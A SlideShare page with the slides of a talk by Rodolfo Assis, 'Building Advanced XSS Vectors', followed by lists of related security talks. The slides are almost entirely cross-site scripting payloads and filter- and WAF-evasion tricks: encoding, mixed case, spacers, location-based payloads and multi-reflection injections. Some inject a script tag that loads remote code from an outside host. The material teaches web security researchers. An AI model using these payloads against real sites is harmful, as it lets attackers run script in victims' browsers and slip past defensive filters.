SlideShare a Scribd company logo

Building Advanced XSS Vectors

R
Rodolfo Assis (Brute)

XSS is much more than just <script>alert(1)</script>. Thousands of unique vectors can be built and more complex payloads to evade filters and WAFs. In these slides, cool techniques to bypass them are described, from HTML to javascript. See also http://brutelogic.com.br/blog

Technology
1 of 61
Download to read offline
Building Advanced XSS Vectors by @brutelogic
About
About - Agenda ● About ● Vector Scheme ● Vector Builder (webGun) ● Agnostic Event Handlers ● Reusing Native Code ● Filter Bypass ● Location Based Payloads ● Multi Reflection
About - Speaker ● Security researcher @sucurisecurity ● Former #1 @openbugbounty ● Some HoF & acknowledgements ● XSS expert
About - Presentation ● Not just another talk on XSS ● Use of alert(1) for didactic purposes ● Mainly about event based XSS ● Some stuff may be hard to follow
Vector Scheme
Vector Scheme ● Regular <tag handler=code> Example: <svg onload=alert(1)>
Vector Scheme ● Full extra1 <tag spacer1 extra2 spacer2 handler spacer3 = spacer4 code spacer5> extra3 Example: <table><thead%0Cstyle=font-size:700px%0Donmouseover%0A=%0Bprompt (1)%09><td>AAAAAAAAA
Vector Builder (webGun) http://brutelogic.com.br/webgun
Vector Builder (webGun) ● Interactive cheat sheet ● Builder of XSS vectors/payloads ● More than 3k unique combinations ● Event or tag oriented ● Handlers by browser ● Handlers by length* ● Manual vector editing ● Test on target or default test page * for filter bypass procedure.
Agnostic Event Handlers
Agnostic Event Handlers ● Used with almost any tag ● Ones that work with arbitrary tags Example: <brute ● Most require UI ● Work on all major browsers
Agnostic Event Handlers - List ● onblur ● onclick ● oncopy ● oncontextmenu ● oncut ● ondblclick ● ondrag ● onfocus ● oninput ● onkeydown ● onkeypress ● onkeyup ● onmousedown ● onmousemove ● onmouseout ● onmouseover ● onmouseup ● onpaste
Agnostic Event Handlers ● Example: <brute onclick=alert(1)>clickme!
Reusing Native Code
Reusing Native Code ● Example 1 ...<input type="hidden" value="INPUT"></form><script type="text/javascript"> function x(){ do something }</script> ● INPUT "><script>alert(1)// or "><script>alert(1)<!--
Reusing Native Code ● Injection ...<input type="hidden" value=""><script>alert(1)//"></form><script type=" text/javascript"> function x(){ do something }</script> ● Result ...<input type="hidden" value=""><script>alert(1)//"></form><script type=" text/javascript"> function x(){ do something }</script>
Reusing Native Code ● Example 2 … <input type="hidden" value="INPUT" > </form> <script type="text/javascript"> function x() { do something } </script> ● INPUT "><script src="//brutelogic.com.br/1 or "><script src="//3334957647/1
Reusing Native Code ● Injection … <input type="hidden" value="" ><script src="//brutelogic.com.br/1" > </form> <script type="text/javascript"> function x() { do something } </script> ● Result … <input type="hidden" value="" ><script src="//brutelogic.com.br/1" > </form> <script type="text/javascript"> function x() { do something } </script>
Filter Bypass
Filter Bypass - Procedure ● Arbitrary tag + fake handler ● Start with 5 chars, increase ● Example <x onxxx=1 (5) pass <x onxxxx=1 (6) pass <x onxxxxx=1 (7) block Up to 6 chars: oncut, onblur, oncopy, ondrag, ondrop, onhelp, onload, onplay, onshow
Filter Bypass - Tricks ● Encoding %3Cx onxxx=1 <%78 onxxx=1 <x %6Fnxxx=1 <x o%6Exxx=1 <x on%78xx=1 <x onxxx%3D1 ● Mixed Case <X onxxx=1 <x ONxxx=1 <x OnXxx=1 <X OnXxx=1 ● Doubling <x onxxx=1 onxxx=1
Filter Bypass - Tricks ● Spacers <x/onxxx=1 <x%09onxxx=1 <x%0Aonxxx=1 <x%0Conxxx=1 <x%0Donxxx=1 <x%2Fonxxx=1 ● Combo <x%2F1=">%22OnXxx%3D1 ● Quotes <x 1='1'onxxx=1 <x 1="1"onxxx=1 ● Mimetism <x </onxxx=1 (closing tag) <x 1=">" onxxx=1 (text outside tag) <http://onxxx%3D1/ (URL)
Location Based Payloads
Location Based Payloads ● Really complex payloads can be built ● document.location properties and similar ● Avoiding special chars (at least between = and >) ● Game over to filter
Location Based Payloads - Document Properties ● location.protocol protocol: // domain / path/page ?p= text1 <tag handler=code> text2 # text3
Location Based Payloads - Document Properties ● location.hostname, document.domain protocol: // domain / path/page ?p= text1 <tag handler=code> text2 # text3
Location Based Payloads - Document Properties ● location.origin protocol: // domain / path/page ?p= text1 <tag handler=code> text2 # text3
Location Based Payloads - Document Properties ● location.pathname protocol: // domain / path/page ?p= text1 <tag handler=code> text2 # text3
Location Based Payloads - Document Properties ● location.search protocol: // domain / path/page ?p= text1 <tag handler=code> text2 # text3
Location Based Payloads - Document Properties ● previousSibling.nodeValue, document.body.textContent* ("Before") protocol: // domain / path/page ?p= text1 <tag handler=code> text2 # text3 * (may need to close the injected tag)
Location Based Payloads - Document Properties ● tagName, nodeName ("Itself") protocol: // domain / path/page ?p= text1 <tag handler=code> text2 # text3
Location Based Payloads - Document Properties ● outerHTML ("Itself") protocol: // domain / path/page ?p= text1 <tag handler=code> text2 # text3
Location Based Payloads - Document Properties ● innerHTML* ("After") protocol: // domain / path/page ?p= text1 <tag handler=code> text2 # text3 * (may need to close the injected tag)
Location Based Payloads - Document Properties ● textContent, nextSibling.nodeValue*, firstChild.nodeValue, lastChild. nodeValue ("After") protocol: // domain / path/page ?p= text1 <tag handler=code> text2 # text3 * (may need to close the injected tag)
Location Based Payloads - Document Properties ● Location.hash ("Hash") protocol: // domain / path/page ?p= text1 <tag handler=code> text2 # text3
Location Based Payloads - Document Properties ● URL, location.href, baseURI, documentURI protocol: // domain / path/page ?p= text1 <tag handler=code> text2 # text3
Location Based Payloads - Evolution 1 <svg onload=location='javascript:alert(1)'> <svg onload=location=location.hash.substr(1)>#javascript:alert(1) <svg onload=location='javas'+'cript:'+'ale'+'rt'+location.hash.substr(1)>#(1) <svg onload=location=/javas/.source+cript:/.source+/ale/.source+/rt/. source+location.hash.substr(1)>#(1) <svg onload=location=/javas/.source+/cript:/.source+/ale/.source+/rt/. source+location.hash[1]+1+location.hash[2]>#()
Location Based Payloads - Evolution 2 <javascript onclick=alert(tagName)>click me! <javascript:alert(1) onclick=location=tagName>click me! <== doesn't work! So... <javascript onclick=location=tagName+location.hash(1)>click me!#:alert(1) <javascript onclick=location=tagName+innerHTML+location.hash>:/*click me! #*/alert(1) javascript + :"click me! + #"-alert(1) javascrip + t:"click me! + #"-alert(1) javas + cript:"click me! + #"-alert(1)
Location Based Payloads - Taxonomy ● By Type 1. Location 2. Location Self 3. Location Self Plus ● By Positioning (Properties) Before < Itself > After # Hash Inside
Location Based Payloads - Location ● Location After (innerHTML) <j onclick=location=innerHTML>javascript&colon;alert(1)// ● Location Inside (name+id) <svg id=t:alert(1) name=javascrip onload=location=name+id>
Location Based Payloads - Location ● Location Itself + After + Hash (tagName+innerHTML+location.hash) <javascript onclick=location=tagName+innerHTML+location.hash>:/*click me! #*/alert(1) <javascript onclick=location=tagName+innerHTML+location.hash>:'click me!#'- alert(1) <javascript onclick=location=tagName+innerHTML+URL>:"-'click me! </javascript>#'-alert(1) Result: javascript + :"-'click me! + http://..."-'click me</javascript>#'-alert(1)
Location Based Payloads - Location ● Location Itself + Hash (tagName+URL) <javascript:"-' onclick=location=tagName+URL>click me!#'-alert(1) (“Labeled Jump”) <javascript: onclick=location=tagName+URL>click me!#%0Aalert(1) Result: javascript: + http://...<javascript: onclick=location=tagName+URL>click me!#% 0Aalert(1)
Location Based Payloads - Location ● Location After + Hash (innerHTML+URL) <j onclick=location=innerHTML+URL>javascript:"-'click me!</j>#'-alert(1) <j onclick=location=innerHTML+URL>javascript:</j>#%0Aalert(1)
Location Based Payloads - Location ● Location Itself + After + Hash (tagName+innerHTML+URL) <javas onclick=location=tagName+innerHTML+URL>cript:"-'click me!</javas>#'- alert(1) <javas onclick=location=tagName+innerHTML+URL>cript:</javas>#%0Aalert(1)
Location Based Payloads - Location ● Location Itself + Before (tagName+previousSibling) "-alert(9)<javascript:" onclick=location=tagName+previousSibling. nodeValue>click me! ● Location Itself + After + Before (tagName+innerHTML+previousSibling) '-alert(9)<javas onclick=location=tagName+innerHTML+previousSibling. nodeValue>cript:'click me!
Location Based Payloads - Location ● Location After + Itself (innerHTML+outerHTML) <alert(1)<!-- onclick=location=innerHTML+outerHTML>javascript:1/*click me! */</alert(1)<!-- --> javascript:1/*click me!*/ + <alert(1)<!-- … </alert(1)<!-- --> <j 1="*/""-alert(1)<!-- onclick=location=innerHTML+outerHTML>javascript: /*click me! javascript:/*click me! + <j 1="*/""-alert(1)<!-- …
Location Based Payloads - Location ● Location After + Before + Itself (innerHTML+previousSibling+outerHTML) */"<j"-alert(9)<!-- onclick=location=innerHTML+previousSibling. nodeValue+outerHTML>javascript:/*click me! javascript:/*click me! + */" + <j"-alert(9)<!-- ... */"<j 1=-alert(9)// onclick=location=innerHTML+previousSibling. nodeValue+outerHTML>javascript:/*click me! javascript:/*click me! + */" + <j 1="-alert(9)//" ...
Location Based Payloads - Location Self ● Location Self Inside p=<svg id=?p=<svg/onload=alert(1)%2B onload=location=id> http://...?p=<svg/onload=alert(1)+ p=<svg id=?p=<script/src=//brutelogic.com.br/1%2B onload=location=id> http://...?p=<script/src=//brutelogic.com.br/1+
Location Based Payloads - Location Self ● Location Self After p=<j onclick=location=textContent>?p=%26lt;svg/onload=alert(1)> http://...?p=<svg/onload=alert(1)>
Location Based Payloads - Location Self Plus ● Location Self Plus Itself p=<j%26p=<svg%2Bonload=alert(1) onclick=location%2B=outerHTML>click me! http://...?p=%3Cj%26p=%3Csvg%2Bonload=alert(1)%20onclick=location% 2B=outerHTML%3Eclick%20me!<j&p=<svg+onload=alert(1) onclick=" location+=outerHTML">
Location Based Payloads - Location Self Plus ● Location Self Plus After p=<j onclick=location%2B=textContent>%26p=%26lt;svg/onload=alert(1)> http://...?p=%3Cj%20onclick=location%2B=textContent%3E%26p=%26lt; svg/onload=alert(1)%3E&p=<svg/onload=alert(1)>
Location Based Payloads - Location Self Plus ● Location Self Plus Before p=%26p=%26lt;svg/onload=alert(1)><j onclick=location%2B=document.body. textContent>click me! http://...?p=%26p=%26lt;svg/onload=alert(1)%3E%3Cj%20onclick=location% 2B=document.body.textContent%3Eclick%20me![BODY_CONTENT] &p=<svg/onload=alert(1)>click me!
Multi Reflection
Multi Reflection - Single Input ● Double Reflection - Single Input p='onload=alert(1)><svg/1=' 'onload=alert(1)><svg/1=' … [code] … 'onload=alert(1)><svg/1=' ● Double Reflection - Single Input (script) p=’>alert(1)</script><script/1=’ p=*/alert(1)</script><script>/* */alert(1)</script><script>/* … [code] … */alert(1)</script><script>/*
Multi Reflection - Single Input ● Triple Reflection - Single Input p=*/alert(1)">'onload="/*<svg/1=' p=`-alert(1)">'onload="`<svg/1=' `-alert(1)">'onload="`<svg/1=' … [code] … `-alert(1)">'onload="`<svg/1=' … [code] … `-alert(1)">'onload="`<svg/1=' ● Triple Reflection - Single Input (script) p=*/</script>'>alert(1)/*<script/1=' */</script>'>alert(1)/*<script/1=' … [code] … */</script>'>alert(1)/*<script/1=' … [code] … */</script>'>alert(1)/*<script/1='
Multi Reflection - Multi Input ● 2 inputs: p=<svg/1='&q='onload=alert(1)> ● 3 inputs: p=<svg 1='&q=onload='/*&r=*/alert(1)'>
Conclusion ● XSS vectors can: - be complex; - easily evade filters; - blow your mind.
Thanks! @brutelogic

Recommended

Attacking thru HTTP Host header
Attacking thru HTTP Host headerAttacking thru HTTP Host header
Attacking thru HTTP Host headerSergey Belov
 
XSS Magic tricks
XSS Magic tricksXSS Magic tricks
XSS Magic tricksGarethHeyes
 
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ BehaviourWAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ BehaviourSoroush Dalili
 
XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015
XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015
XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015CODE BLUE
 
Waf bypassing Techniques
Waf bypassing TechniquesWaf bypassing Techniques
Waf bypassing TechniquesAvinash Thapa
 
Neat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protectionNeat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protectionMikhail Egorov
 
XSS - Do you know EVERYTHING?
XSS - Do you know EVERYTHING?XSS - Do you know EVERYTHING?
XSS - Do you know EVERYTHING?Yurii Bilyk
 
How to steal and modify data using Business Logic flaws - Insecure Direct Obj...
How to steal and modify data using Business Logic flaws - Insecure Direct Obj...How to steal and modify data using Business Logic flaws - Insecure Direct Obj...
How to steal and modify data using Business Logic flaws - Insecure Direct Obj...Frans Rosén
 

Recommended

Attacking thru HTTP Host header
Attacking thru HTTP Host headerAttacking thru HTTP Host header
Attacking thru HTTP Host headerSergey Belov
 
XSS Magic tricks
XSS Magic tricksXSS Magic tricks
XSS Magic tricksGarethHeyes
 
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ BehaviourWAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ BehaviourSoroush Dalili
 
XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015
XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015
XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015CODE BLUE
 
Waf bypassing Techniques
Waf bypassing TechniquesWaf bypassing Techniques
Waf bypassing TechniquesAvinash Thapa
 
Neat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protectionNeat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protectionMikhail Egorov
 
XSS - Do you know EVERYTHING?
XSS - Do you know EVERYTHING?XSS - Do you know EVERYTHING?
XSS - Do you know EVERYTHING?Yurii Bilyk
 
How to steal and modify data using Business Logic flaws - Insecure Direct Obj...
How to steal and modify data using Business Logic flaws - Insecure Direct Obj...How to steal and modify data using Business Logic flaws - Insecure Direct Obj...
How to steal and modify data using Business Logic flaws - Insecure Direct Obj...Frans Rosén
 
A Forgotten HTTP Invisibility Cloak
A Forgotten HTTP Invisibility CloakA Forgotten HTTP Invisibility Cloak
A Forgotten HTTP Invisibility CloakSoroush Dalili
 
Ekoparty 2017 - The Bug Hunter's Methodology
Ekoparty 2017 - The Bug Hunter's MethodologyEkoparty 2017 - The Bug Hunter's Methodology
Ekoparty 2017 - The Bug Hunter's Methodologybugcrowd
 
Garage4Hackers Ranchoddas Webcast Series - Bypassing Modern WAF's Exemplified...
Garage4Hackers Ranchoddas Webcast Series - Bypassing Modern WAF's Exemplified...Garage4Hackers Ranchoddas Webcast Series - Bypassing Modern WAF's Exemplified...
Garage4Hackers Ranchoddas Webcast Series - Bypassing Modern WAF's Exemplified...Garage4hackers.com
 
Frans Rosén Keynote at BSides Ahmedabad
Frans Rosén Keynote at BSides AhmedabadFrans Rosén Keynote at BSides Ahmedabad
Frans Rosén Keynote at BSides AhmedabadSecurity BSides Ahmedabad
 
What should a hacker know about WebDav?
What should a hacker know about WebDav?What should a hacker know about WebDav?
What should a hacker know about WebDav?Mikhail Egorov
 
SSRF For Bug Bounties
SSRF For Bug BountiesSSRF For Bug Bounties
SSRF For Bug BountiesOWASP Nagpur
 
Offzone | Another waf bypass
Offzone | Another waf bypassOffzone | Another waf bypass
Offzone | Another waf bypassДмитрий Бумов
 
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016Frans Rosén
 
OWASP AppSecEU 2018 – Attacking "Modern" Web Technologies
OWASP AppSecEU 2018 – Attacking "Modern" Web TechnologiesOWASP AppSecEU 2018 – Attacking "Modern" Web Technologies
OWASP AppSecEU 2018 – Attacking "Modern" Web TechnologiesFrans Rosén
 
HTTP Request Smuggling via higher HTTP versions
HTTP Request Smuggling via higher HTTP versionsHTTP Request Smuggling via higher HTTP versions
HTTP Request Smuggling via higher HTTP versionsneexemil
 
Live Hacking like a MVH – A walkthrough on methodology and strategies to win big
Live Hacking like a MVH – A walkthrough on methodology and strategies to win bigLive Hacking like a MVH – A walkthrough on methodology and strategies to win big
Live Hacking like a MVH – A walkthrough on methodology and strategies to win bigFrans Rosén
 
HTTP Security Headers
HTTP Security HeadersHTTP Security Headers
HTTP Security HeadersIsmael Goncalves
 
Pentesting ReST API
Pentesting ReST APIPentesting ReST API
Pentesting ReST APINutan Kumar Panda
 
A story of the passive aggressive sysadmin of AEM
A story of the passive aggressive sysadmin of AEMA story of the passive aggressive sysadmin of AEM
A story of the passive aggressive sysadmin of AEMFrans Rosén
 
ZeroNights 2018 | I <"3 XSS
ZeroNights 2018 | I <"3 XSSZeroNights 2018 | I <"3 XSS
ZeroNights 2018 | I <"3 XSSДмитрий Бумов
 
How to Shot Web - Jason Haddix at DEFCON 23 - See it Live: Details in Descrip...
How to Shot Web - Jason Haddix at DEFCON 23 - See it Live: Details in Descrip...How to Shot Web - Jason Haddix at DEFCON 23 - See it Live: Details in Descrip...
How to Shot Web - Jason Haddix at DEFCON 23 - See it Live: Details in Descrip...bugcrowd
 
Cross Site Request Forgery
Cross Site Request ForgeryCross Site Request Forgery
Cross Site Request ForgeryTony Bibbs
 
Cross Origin Resource Sharing
Cross Origin Resource SharingCross Origin Resource Sharing
Cross Origin Resource SharingLuke Weerasooriya
 
Reverse proxies & Inconsistency
Reverse proxies & InconsistencyReverse proxies & Inconsistency
Reverse proxies & InconsistencyGreenD0g
 
What’s wrong with WebSocket APIs? Unveiling vulnerabilities in WebSocket APIs.
What’s wrong with WebSocket APIs? Unveiling vulnerabilities in WebSocket APIs.What’s wrong with WebSocket APIs? Unveiling vulnerabilities in WebSocket APIs.
What’s wrong with WebSocket APIs? Unveiling vulnerabilities in WebSocket APIs.Mikhail Egorov
 
The Hidden XSS - Attacking the Desktop & Mobile Platforms
The Hidden XSS - Attacking the Desktop & Mobile PlatformsThe Hidden XSS - Attacking the Desktop & Mobile Platforms
The Hidden XSS - Attacking the Desktop & Mobile Platformskosborn
 
주로사용되는 Xss필터와 이를 공격하는 방법
주로사용되는 Xss필터와 이를 공격하는 방법주로사용되는 Xss필터와 이를 공격하는 방법
주로사용되는 Xss필터와 이를 공격하는 방법guestad13b55
 

More Related Content

What's hot

A Forgotten HTTP Invisibility Cloak
A Forgotten HTTP Invisibility CloakA Forgotten HTTP Invisibility Cloak
A Forgotten HTTP Invisibility CloakSoroush Dalili
 
Ekoparty 2017 - The Bug Hunter's Methodology
Ekoparty 2017 - The Bug Hunter's MethodologyEkoparty 2017 - The Bug Hunter's Methodology
Ekoparty 2017 - The Bug Hunter's Methodologybugcrowd
 
Garage4Hackers Ranchoddas Webcast Series - Bypassing Modern WAF's Exemplified...
Garage4Hackers Ranchoddas Webcast Series - Bypassing Modern WAF's Exemplified...Garage4Hackers Ranchoddas Webcast Series - Bypassing Modern WAF's Exemplified...
Garage4Hackers Ranchoddas Webcast Series - Bypassing Modern WAF's Exemplified...Garage4hackers.com
 
What should a hacker know about WebDav?
What should a hacker know about WebDav?What should a hacker know about WebDav?
What should a hacker know about WebDav?Mikhail Egorov
 
SSRF For Bug Bounties
SSRF For Bug BountiesSSRF For Bug Bounties
SSRF For Bug BountiesOWASP Nagpur
 
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016Frans Rosén
 
OWASP AppSecEU 2018 – Attacking "Modern" Web Technologies
OWASP AppSecEU 2018 – Attacking "Modern" Web TechnologiesOWASP AppSecEU 2018 – Attacking "Modern" Web Technologies
OWASP AppSecEU 2018 – Attacking "Modern" Web TechnologiesFrans Rosén
 
HTTP Request Smuggling via higher HTTP versions
HTTP Request Smuggling via higher HTTP versionsHTTP Request Smuggling via higher HTTP versions
HTTP Request Smuggling via higher HTTP versionsneexemil
 
Live Hacking like a MVH – A walkthrough on methodology and strategies to win big
Live Hacking like a MVH – A walkthrough on methodology and strategies to win bigLive Hacking like a MVH – A walkthrough on methodology and strategies to win big
Live Hacking like a MVH – A walkthrough on methodology and strategies to win bigFrans Rosén
 
A story of the passive aggressive sysadmin of AEM
A story of the passive aggressive sysadmin of AEMA story of the passive aggressive sysadmin of AEM
A story of the passive aggressive sysadmin of AEMFrans Rosén
 
How to Shot Web - Jason Haddix at DEFCON 23 - See it Live: Details in Descrip...
How to Shot Web - Jason Haddix at DEFCON 23 - See it Live: Details in Descrip...How to Shot Web - Jason Haddix at DEFCON 23 - See it Live: Details in Descrip...
How to Shot Web - Jason Haddix at DEFCON 23 - See it Live: Details in Descrip...bugcrowd
 
Cross Site Request Forgery
Cross Site Request ForgeryCross Site Request Forgery
Cross Site Request ForgeryTony Bibbs
 
Cross Origin Resource Sharing
Cross Origin Resource SharingCross Origin Resource Sharing
Cross Origin Resource SharingLuke Weerasooriya
 
Reverse proxies & Inconsistency
Reverse proxies & InconsistencyReverse proxies & Inconsistency
Reverse proxies & InconsistencyGreenD0g
 
What’s wrong with WebSocket APIs? Unveiling vulnerabilities in WebSocket APIs.
What’s wrong with WebSocket APIs? Unveiling vulnerabilities in WebSocket APIs.What’s wrong with WebSocket APIs? Unveiling vulnerabilities in WebSocket APIs.
What’s wrong with WebSocket APIs? Unveiling vulnerabilities in WebSocket APIs.Mikhail Egorov
 

What's hot (20)

A Forgotten HTTP Invisibility Cloak
A Forgotten HTTP Invisibility CloakA Forgotten HTTP Invisibility Cloak
A Forgotten HTTP Invisibility Cloak
 
Ekoparty 2017 - The Bug Hunter's Methodology
Ekoparty 2017 - The Bug Hunter's MethodologyEkoparty 2017 - The Bug Hunter's Methodology
Ekoparty 2017 - The Bug Hunter's Methodology
 
Garage4Hackers Ranchoddas Webcast Series - Bypassing Modern WAF's Exemplified...
Garage4Hackers Ranchoddas Webcast Series - Bypassing Modern WAF's Exemplified...Garage4Hackers Ranchoddas Webcast Series - Bypassing Modern WAF's Exemplified...
Garage4Hackers Ranchoddas Webcast Series - Bypassing Modern WAF's Exemplified...
 
Frans Rosén Keynote at BSides Ahmedabad
Frans Rosén Keynote at BSides AhmedabadFrans Rosén Keynote at BSides Ahmedabad
Frans Rosén Keynote at BSides Ahmedabad
 
What should a hacker know about WebDav?
What should a hacker know about WebDav?What should a hacker know about WebDav?
What should a hacker know about WebDav?
 
SSRF For Bug Bounties
SSRF For Bug BountiesSSRF For Bug Bounties
SSRF For Bug Bounties
 
Offzone | Another waf bypass
Offzone | Another waf bypassOffzone | Another waf bypass
Offzone | Another waf bypass
 
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016
 
OWASP AppSecEU 2018 – Attacking "Modern" Web Technologies
OWASP AppSecEU 2018 – Attacking "Modern" Web TechnologiesOWASP AppSecEU 2018 – Attacking "Modern" Web Technologies
OWASP AppSecEU 2018 – Attacking "Modern" Web Technologies
 
HTTP Request Smuggling via higher HTTP versions
HTTP Request Smuggling via higher HTTP versionsHTTP Request Smuggling via higher HTTP versions
HTTP Request Smuggling via higher HTTP versions
 
Live Hacking like a MVH – A walkthrough on methodology and strategies to win big
Live Hacking like a MVH – A walkthrough on methodology and strategies to win bigLive Hacking like a MVH – A walkthrough on methodology and strategies to win big
Live Hacking like a MVH – A walkthrough on methodology and strategies to win big
 
HTTP Security Headers
HTTP Security HeadersHTTP Security Headers
HTTP Security Headers
 
Pentesting ReST API
Pentesting ReST APIPentesting ReST API
Pentesting ReST API
 
A story of the passive aggressive sysadmin of AEM
A story of the passive aggressive sysadmin of AEMA story of the passive aggressive sysadmin of AEM
A story of the passive aggressive sysadmin of AEM
 
ZeroNights 2018 | I <"3 XSS
ZeroNights 2018 | I <"3 XSSZeroNights 2018 | I <"3 XSS
ZeroNights 2018 | I <"3 XSS
 
How to Shot Web - Jason Haddix at DEFCON 23 - See it Live: Details in Descrip...
How to Shot Web - Jason Haddix at DEFCON 23 - See it Live: Details in Descrip...How to Shot Web - Jason Haddix at DEFCON 23 - See it Live: Details in Descrip...
How to Shot Web - Jason Haddix at DEFCON 23 - See it Live: Details in Descrip...
 
Cross Site Request Forgery
Cross Site Request ForgeryCross Site Request Forgery
Cross Site Request Forgery
 
Cross Origin Resource Sharing
Cross Origin Resource SharingCross Origin Resource Sharing
Cross Origin Resource Sharing
 
Reverse proxies & Inconsistency
Reverse proxies & InconsistencyReverse proxies & Inconsistency
Reverse proxies & Inconsistency
 
What’s wrong with WebSocket APIs? Unveiling vulnerabilities in WebSocket APIs.
What’s wrong with WebSocket APIs? Unveiling vulnerabilities in WebSocket APIs.What’s wrong with WebSocket APIs? Unveiling vulnerabilities in WebSocket APIs.
What’s wrong with WebSocket APIs? Unveiling vulnerabilities in WebSocket APIs.
 

Viewers also liked

The Hidden XSS - Attacking the Desktop & Mobile Platforms
The Hidden XSS - Attacking the Desktop & Mobile PlatformsThe Hidden XSS - Attacking the Desktop & Mobile Platforms
The Hidden XSS - Attacking the Desktop & Mobile Platformskosborn
 
주로사용되는 Xss필터와 이를 공격하는 방법
주로사용되는 Xss필터와 이를 공격하는 방법주로사용되는 Xss필터와 이를 공격하는 방법
주로사용되는 Xss필터와 이를 공격하는 방법guestad13b55
 
New Methods in Automated XSS Detection & Dynamic Exploit Creation
New Methods in Automated XSS Detection & Dynamic Exploit CreationNew Methods in Automated XSS Detection & Dynamic Exploit Creation
New Methods in Automated XSS Detection & Dynamic Exploit CreationKen Belva
 
libinjection: from SQLi to XSS  by Nick Galbreath
libinjection: from SQLi to XSS  by Nick Galbreathlibinjection: from SQLi to XSS  by Nick Galbreath
libinjection: from SQLi to XSS  by Nick GalbreathCODE BLUE
 
[CB16] Electron - Build cross platform desktop XSS, it’s easier than you thin...
[CB16] Electron - Build cross platform desktop XSS, it’s easier than you thin...[CB16] Electron - Build cross platform desktop XSS, it’s easier than you thin...
[CB16] Electron - Build cross platform desktop XSS, it’s easier than you thin...CODE BLUE
 
Copy & Pest - A case-study on the clipboard, blind trust and invisible cross-...
Copy & Pest - A case-study on the clipboard, blind trust and invisible cross-...Copy & Pest - A case-study on the clipboard, blind trust and invisible cross-...
Copy & Pest - A case-study on the clipboard, blind trust and invisible cross-...Mario Heiderich
 
XSS and CSRF with HTML5
XSS and CSRF with HTML5XSS and CSRF with HTML5
XSS and CSRF with HTML5Shreeraj Shah
 
JavaScript Static Security Analysis made easy with JSPrime
JavaScript Static Security Analysis made easy with JSPrimeJavaScript Static Security Analysis made easy with JSPrime
JavaScript Static Security Analysis made easy with JSPrimeNishant Das Patnaik
 
Sucuri Webinar: How to Clean a Hacked Magento Website
Sucuri Webinar: How to Clean a Hacked Magento WebsiteSucuri Webinar: How to Clean a Hacked Magento Website
Sucuri Webinar: How to Clean a Hacked Magento WebsiteSucuri
 
Xss is more than a simple threat
Xss is more than a simple threatXss is more than a simple threat
Xss is more than a simple threatAvădănei Andrei
 
Pengenalan HTML5, Mobile Application, dan Intel XDK
Pengenalan HTML5, Mobile Application, dan Intel XDKPengenalan HTML5, Mobile Application, dan Intel XDK
Pengenalan HTML5, Mobile Application, dan Intel XDKMuhammad Yusuf
 
Sucuri Webinar: Defending Your Google Brand Reputation and Analytics Reports
Sucuri Webinar: Defending Your Google Brand Reputation and Analytics ReportsSucuri Webinar: Defending Your Google Brand Reputation and Analytics Reports
Sucuri Webinar: Defending Your Google Brand Reputation and Analytics ReportsSucuri
 
Owasp AppSecEU 2015 - BeEF Session
Owasp AppSecEU 2015 - BeEF SessionOwasp AppSecEU 2015 - BeEF Session
Owasp AppSecEU 2015 - BeEF SessionBart Leppens
 
{{more}} Kibana4
{{more}} Kibana4{{more}} Kibana4
{{more}} Kibana4琛琳 饶
 
How to-catch-a-chameleon-steven seeley-ruxcon-2012
How to-catch-a-chameleon-steven seeley-ruxcon-2012How to-catch-a-chameleon-steven seeley-ruxcon-2012
How to-catch-a-chameleon-steven seeley-ruxcon-2012_mr_me
 
Final lfh presentation (3)
Final lfh presentation (3)Final lfh presentation (3)
Final lfh presentation (3)__x86
 
Apache安装配置mod security
Apache安装配置mod securityApache安装配置mod security
Apache安装配置mod securityHuang Toby
 
D2 t2 steven seeley - ghost in the windows 7 allocator
D2 t2 steven seeley - ghost in the windows 7 allocatorD2 t2 steven seeley - ghost in the windows 7 allocator
D2 t2 steven seeley - ghost in the windows 7 allocator_mr_me
 

Viewers also liked (20)

The Hidden XSS - Attacking the Desktop & Mobile Platforms
The Hidden XSS - Attacking the Desktop & Mobile PlatformsThe Hidden XSS - Attacking the Desktop & Mobile Platforms
The Hidden XSS - Attacking the Desktop & Mobile Platforms
 
주로사용되는 Xss필터와 이를 공격하는 방법
주로사용되는 Xss필터와 이를 공격하는 방법주로사용되는 Xss필터와 이를 공격하는 방법
주로사용되는 Xss필터와 이를 공격하는 방법
 
New Methods in Automated XSS Detection & Dynamic Exploit Creation
New Methods in Automated XSS Detection & Dynamic Exploit CreationNew Methods in Automated XSS Detection & Dynamic Exploit Creation
New Methods in Automated XSS Detection & Dynamic Exploit Creation
 
